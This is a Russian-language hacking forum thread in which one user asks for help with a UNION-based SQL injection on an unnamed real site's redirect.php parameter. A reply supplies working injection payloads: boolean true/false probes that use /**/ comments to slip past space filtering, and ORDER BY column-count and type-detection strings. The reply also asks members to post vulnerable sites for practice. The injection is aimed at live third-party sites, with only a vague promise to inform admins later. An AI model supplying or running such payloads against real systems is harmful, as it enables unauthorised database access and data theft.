Сообщение от
shumaher
Вопрос по sql inj
Делаю запрос:
redirect.php?lid=' union select 1,2,3,4,5,6,7,8,9 --+
говорит что нужно продолжить подбирать количество столбцов
ок. уже посылаю такой запрос redirect.php?lid=' union select 1,2,3,4,5,6,7,8,9,10 --+
нарушен синтаксис и выдает:
Как правильно составить запрос? прощу помощи. Думаю сайт светить не обязательно. я просто тренируюсь, потом админов оповещу.
Думаю проблема или в пробеле (что навряд ли), при условии что ты нашёл инъекцию в строковой переменной.
тогда попробуй запросы
Код:
id=1'/**/and/**/1='1
id=1'/**/and/**/1='2
Если результаты будут отличаться - фильтруется пробел
Ещё возможно что ты ковыряешь целочисленную перменную, тогда попробуй так
Код:
id=1/**/and/**/1=1
id=1/**/and/**/1=2
Если страницы отличаются - это твой случай
Перед использованием order by не грешно было бы проверить какого типа переменная перед тобой
id='/**/and/**/1=1/**/order/**/by/**/100+--+
или
id='/**/order/**/by/**/'100
выплюнет что столбцов много - у тебя переменная строкового типа
id=/**/and/**/1=1/**/order/**/by/**/100+--+
соответственно аналог
id/**/order/**/by/**/100
выплюнет что столбцов много - у тебя переменная целочисленного типа
З.Ы. А вообще это заезженная тема, гораздо приятнее работать не с теорией а практикой. Так что прошу по возможности выкладывать сюда сайты, вызывающие проблемы.
З.Ы.Ы. не поленись почитать
это